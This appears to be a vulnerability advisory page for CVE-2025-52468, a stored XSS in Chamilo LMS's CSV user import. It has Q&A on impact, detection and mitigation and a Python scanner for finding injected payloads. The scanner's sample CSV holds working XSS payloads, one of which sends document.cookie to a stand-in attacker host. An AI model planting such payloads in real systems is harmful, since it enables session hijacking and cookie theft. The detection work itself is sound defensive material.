CVE-2025-52468
Stored XSS in Chamilo User Import Allows Script Execution
Publication date: 2026-03-02
Last updated on: 2026-03-03
Assigner: GitHub, Inc.
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| chamilo | chamilo_lms | < 1.11.30 (fixed in 1.11.30) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-52468 is a high-severity stored cross-site scripting (XSS) vulnerability in the Chamilo learning management system, reported for versions up to 1.11.28. The CSV user import does not validate or sanitize the "Last Name", "First Name" and "Username" fields.

An attacker who can run the import can place JavaScript payloads in those fields. The values are written to the database as-is, and the script runs whenever an authenticated user views the affected user's profile, in that viewer's session context.

The consequences are the usual ones for stored XSS: session hijacking, theft of data visible to the victim, and actions performed as the victim. The "Who is Online" page renders the same name fields, so if Chamilo is configured to show that page to anonymous visitors and the malicious account is online, even unauthenticated visitors are affected. The issue was fixed in Chamilo version 1.11.30. [1]
How can this vulnerability impact me?
Scripts injected through this flaw run in the browser of whoever views the affected profile, with that user's session and privileges; for an administrator victim this means possible session hijacking, exposure of platform data and unauthorized actions performed in the victim's name.

The vector is network-based, but planting the payload requires access to the CSV user import, which in Chamilo is an administrative function: the attacker either holds such an account or gets an administrator to import an attacker-supplied CSV file. Once the payload is stored, triggering it needs no privileges at all: any user who opens the profile, or any visitor to the "Who is Online" page while the malicious account is online, executes it, which widens the attack surface considerably.

Overall, confidentiality and integrity of user data and sessions are at stake, and abuse of a hijacked administrator session can disrupt the platform and learning activities. [1]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection means finding payloads already stored in the "Last Name", "First Name" and "Username" fields, since these values came in through CSV imports.

The simplest check is to review the imported CSV files, or an export of the user table, for script tags, event-handler attributes and javascript: URLs. A search for the literal string <script alone is not enough: attribute-based payloads (onerror=, onload=, ...) and entity- or percent-encoded variants work just as well and will not contain it.

Script execution itself happens in the victim's browser and is invisible to the server. What server-side data can show is who requested whoisonline.php and user-profile pages, and, if a Content-Security-Policy with a report-uri or report-to directive is deployed, violation reports for inline scripts on those pages.

Commands to assist detection:

- Scan CSV files or database exports for common XSS patterns, e.g.: grep -iE '<script|onerror|onload|javascript:' users.csv
- Query the user table directly. In Chamilo 1.11 the table is named `user`, and the LIKE patterns should cover the same indicators as the grep above; for example: SELECT id, username, firstname, lastname FROM user WHERE firstname LIKE '%<script%' OR lastname LIKE '%<script%' OR username LIKE '%<script%';
- Review web server logs for requests to whoisonline.php and user-profile pages around the time of a suspicious import, which can indicate attempts to trigger the payload. [1]
What immediate steps should I take to mitigate this vulnerability?
- Upgrade Chamilo LMS to version 1.11.30 or later, which contains the fix. [1, 2]
- If you cannot upgrade immediately, suspend CSV user imports until the patch is applied.
- Review existing user data that came from CSV imports and remove any script from the "Last Name", "First Name" and "Username" fields; exporting the user table, scanning it and correcting affected accounts through the admin interface is the safest route.
- Restrict the user-import function to a small set of trusted administrators, and treat CSV files supplied by third parties as untrusted input.
- Watch user profiles and the "Who is Online" page for unexpected script execution or unusual content; a Content-Security-Policy that forbids inline scripts limits the impact of any payload that is still stored.
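The following scanner serves both the detection question above and the review step in the mitigation list. It is an added example written for this page, not Chamilo code or part of the advisory. It assumes the column layout of Chamilo's user import CSV (a header line with LastName;FirstName;UserName;... columns, semicolon-separated) and generalizes the grep and LIKE checks by decoding HTML entities and percent-encoding before matching, so encoded variants of a payload are caught as well. The sample CSV rows are constructed for the example.

```python
import csv
import html
import io
import re
from urllib.parse import unquote

# Fields CVE-2025-52468 names as unsanitised in the Chamilo user import.
# Column names follow Chamilo's CSV import header (assumed here).
SUSPECT_FIELDS = ("LastName", "FirstName", "UserName")

# Indicators of HTML/JS injection; matched after decoding so that
# entity-encoded (&lt;script&gt;) or percent-encoded (%3Cscript%3E)
# payloads are not missed, which a plain LIKE '%<script%' would.
XSS_PATTERN = re.compile(
    r"<\s*/?\s*(script|img|svg|iframe|object|embed|body|math|style)\b"  # tag injection
    r"|\bon[a-z]+\s*="          # event handler attribute, e.g. onerror=
    r"|javascript\s*:"          # javascript: URL
    r"|data\s*:\s*text/html",   # data: URL carrying HTML
    re.IGNORECASE,
)


def normalize(value: str) -> str:
    """Undo percent- and HTML-entity encoding until nothing changes."""
    seen = set()
    current = value
    while current not in seen:      # fixed point; also terminates on any cycle
        seen.add(current)
        current = html.unescape(unquote(current))
    return current


def scan_value(value: str):
    """Return the matched indicator if the decoded value looks like XSS, else None."""
    match = XSS_PATTERN.search(normalize(value))
    return match.group(0) if match else None


def scan_rows(rows, fields=SUSPECT_FIELDS, first_line=2):
    """Scan dict rows (from csv.DictReader or a DB cursor) and report hits.

    first_line is the file line number of the first data row
    (2 when line 1 is the CSV header).
    """
    findings = []
    for line_no, row in enumerate(rows, start=first_line):
        for field in fields:
            value = row.get(field) or ""
            indicator = scan_value(value)
            if indicator is not None:
                findings.append({"line": line_no, "field": field,
                                 "value": value, "indicator": indicator})
    return findings


def scan_csv(text: str, delimiter: str = ";"):
    """Scan a Chamilo-style user import CSV (semicolon-separated, header row)."""
    return scan_rows(csv.DictReader(io.StringIO(text), delimiter=delimiter))


# Constructed sample: one benign row and three rows carrying payloads in the
# fields the advisory names, including an entity-encoded variant.
SAMPLE_CSV = (
    "LastName;FirstName;UserName;Password;AuthSource;Email;Status\n"
    "Doe;Jane;jdoe;s3cret;platform;jane@example.org;5\n"
    "<script>alert(document.cookie)</script>;Mallory;mallory;pw;platform;m@example.org;5\n"
    "Smith;\"<img src=x onerror=fetch('https://attacker.example/'+document.cookie)>\";"
    "smith;pw;platform;s@example.org;5\n"
    "\"&lt;svg onload=alert(1)&gt;\";Eve;eve;pw;platform;e@example.org;5\n"
)

if __name__ == "__main__":
    for hit in scan_csv(SAMPLE_CSV):
        print(f"line {hit['line']}: {hit['field']} matched {hit['indicator']!r}: {hit['value']}")
```

To run the same check against the database instead of a file, fetch rows from Chamilo's `user` table as dicts and call scan_rows(rows, fields=("lastname", "firstname", "username"), first_line=1); the matching logic is identical, and the indicator reported for each hit tells you which pattern fired so that false positives (a legitimate name containing "on...=" is rare but possible) can be dismissed by hand.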